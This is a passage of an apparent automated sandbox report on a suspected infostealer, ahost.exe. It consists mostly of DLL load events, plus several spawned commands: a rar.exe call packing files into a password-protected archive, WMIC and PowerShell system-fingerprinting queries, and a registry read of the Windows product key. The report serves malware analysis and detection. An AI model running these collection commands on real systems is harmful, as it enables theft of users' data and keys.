              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
